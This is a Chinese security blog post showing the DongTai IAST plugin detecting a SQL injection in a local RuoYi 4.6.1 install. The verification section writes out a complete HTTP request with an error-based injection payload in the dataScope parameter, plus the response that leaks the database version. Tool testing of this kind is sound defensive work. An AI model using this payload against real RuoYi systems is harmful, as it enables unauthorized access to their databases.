洞态IAST检测RuoYi的sql注入漏洞

  • A+
所属分类:安全文章

01

背景


因为看到 Xcheck 发的自动检测到开源项目 RuoYi 的 sql 注入漏洞,因此打算用该漏洞验证一下洞态 IAST 的漏洞检测能力。洞态 IAST 的检测方式是扫描运行中的应用程序,将扫描到的漏洞信息发送到云端进行处理、展示。


02

验证方式


本次验证选择在本地 IDEA 运行 Xcheck 测试的 RuoYi 版本(4.6.1),使用洞态 IAST 的 IDEA 插件对其进行快速检测。


03

本地环境搭建


1.克隆 RuoYi 源码


$ git clone https://github.com/yangzongzhuan/RuoYi.git


注:RuoYi 新版本已修复漏洞,需要将项目版本改为4.6.1,或者直接下载 RuoYi-4.6.1的源码包。


RuoYi-4.6.1源码下载:https://github.com/yangzongzhuan/RuoYi/archive/refs/tags/v4.6.1.zip


2.使用 IDEA 打开项目


3.修改ruoyi-admin模块下的application-druid.yml中的数据库信息,将username和password改为本地数据库


洞态IAST检测RuoYi的sql注入漏洞


4.创建数据库ry,导入项目sql文件夹下的.sql文件


mysql -utest -p1234 -e "CREATE DATABASE ry DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;"mysql -utest -p1234 ry<quartz.sqlmysql -utest -p1234 ry<ry_20210210.sql


04

IDEA插件的下载与安装


1.下载 DongTai IAST 插件 下载地址:


https://github.com/HXSecurity/DongTai-Plugin-IDEA/releases/download/v1.0/DongTai-Plugin-IDEA.zip


2.安装


3.打开 IDEA preferences 界面的 Plugins,选择从本地下载,导入下载好的插件DongTai-Plugin-IDEA.zip。


洞态IAST检测RuoYi的sql注入漏洞


选中插件,启动插件功能(无需重新启动IDEA)。


官方文档:https://hxsecurity.github.io/DongTaiDoc/#/doc/tutorial/plugin


05

运行项目


1.使用插件功能“Run With IAST”或者“Debug With IAST”启动项目


使用 IDEA 打开本次检测项目“RuoYi”,版本为4.6.1。


配置好数据库等配置文件,使用“Run With IAST”或者“Debug With IAST”启动或调试项目。注意:第一次使用该功能需要配置Token(Token需要登陆洞态IAST官网在 部署IAST 中获取,详细请看官方文档)。


洞态IAST检测RuoYi的sql注入漏洞


洞态IAST检测RuoYi的sql注入漏洞


项目启动成功,访问 127.0.0.1:80


洞态IAST检测RuoYi的sql注入漏洞


06

漏洞检测


1.测试项目功能,开始被动式挖洞。访问“角色管理”功能,会出现“http://localhost/system/role/list的POST请求出现SQL注入漏洞”。


洞态IAST检测RuoYi的sql注入漏洞


2.查看“漏洞列表”面板


访问项目功能后,打开“漏洞列表”面板,查看已检测到的漏洞的概要信息


洞态IAST检测RuoYi的sql注入漏洞


查看“http://localhost/system/role/list的POST请求出现SQL注入漏洞”,选中它然后点击查看详情,跳转到洞态IAST漏洞详情页面,开始分析漏洞


洞态IAST检测RuoYi的sql注入漏洞


洞态IAST检测RuoYi的sql注入漏洞


07

漏洞验证


使用Burp Suite进行抓包,进行报错注入获取到数据库的版本号。


POST /system/role/list HTTP/1.1Host: localhostContent-Length: 214sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Content-Type: application/x-www-form-urlencodedOrigin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/system/roleAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=142a87a0-faef-479c-a158-67de9d8b14aaConnection: close
pageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params%5BdataScope%5D=and extractvalue(rand(),+concat(0x3a,substring(version(),1,30)))=1


通过注入获取到了数据库的版本号,漏洞验证成功。


HTTP/1.1 200 Content-Type: application/jsonDate: Mon, 12 Jul 2021 06:34:54 GMTConnection: closeContent-Length: 1101
{"msg":"运行时异常:n### Error querying database.  Cause: java.sql.SQLException: XPATH syntax error: ':8.0.25'n### The error may exist in URL [jar:file:/Users/erzhuangniu/workspace/bugenv/docker/ruoyi-admin.jar!/BOOT-INF/lib/ruoyi-system-4.6.1.jar!/mapper/system/SysRoleMapper.xml]n### The error may involve com.ruoyi.system.mapper.SysRoleMapper.selectRoleList-Inlinen### The error occurred while setting parametersn### SQL: SELECT count(0) FROM (SELECT DISTINCT r.role_id, r.role_name, r.role_key, r.role_sort, r.data_scope, r.status, r.del_flag, r.create_time, r.remark FROM sys_role r LEFT JOIN sys_user_role ur ON ur.role_id = r.role_id LEFT JOIN sys_user u ON u.user_id = ur.user_id LEFT JOIN sys_dept d ON u.dept_id = d.dept_id WHERE r.del_flag = '0' AND extractvalue(rand(), concat(0x3a, substring(version(), 1, 30))) = 1) table_countn### Cause: java.sql.SQLException: XPATH syntax error: ':8.0.25'n; uncategorized SQLException; SQL state [HY000]; error code [1105]; XPATH syntax error: ':8.0.25'; nested exception is java.sql.SQLException: XPATH syntax error: ':8.0.25'","code":500}


洞态IAST检测RuoYi的sql注入漏洞


08

总结


通过本次测试发现洞态IAST在漏洞检出上效果很好,而且多次测试还检测出了RuoYi的其他漏洞,经过漏洞验证均为真实漏洞,而洞态IAST的IDEA插件又降低了检测漏洞的门槛,只需在IDEA中运行项目即可进行检测漏洞,十分方便,推荐大家尝试、使用。


09

参考


Xcheck Java引擎漏洞挖掘&防护识别

DongTai

DongTai官方文档


账号申请

SaaS版本地址:https://iast.huoxian.cn

SaaS版本账号申请

洞态IAST检测RuoYi的sql注入漏洞

洞态IAST合作伙伴计划之整体开源联合开发,申请方式请扫描下方二维码

洞态IAST检测RuoYi的sql注入漏洞

如需加入技术讨论群,扫描二维码添加微信并备注"洞态IAST-加群",工作人员将拉您进群

洞态IAST检测RuoYi的sql注入漏洞
洞态IAST检测RuoYi的sql注入漏洞

【火线短视频精选】


【周度激励】


洞态IAST检测RuoYi的sql注入漏洞


【相关精选文章】


如何对 DongTai-agent-java 进行 Debug

平台某项目-服务器SSH密钥与日志和命令记录泄露


火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火线小助手]加入。


我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!


欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!


洞态IAST检测RuoYi的sql注入漏洞

洞态IAST检测RuoYi的sql注入漏洞

洞态IAST检测RuoYi的sql注入漏洞

本文始发于微信公众号(火线Zone):洞态IAST检测RuoYi的sql注入漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: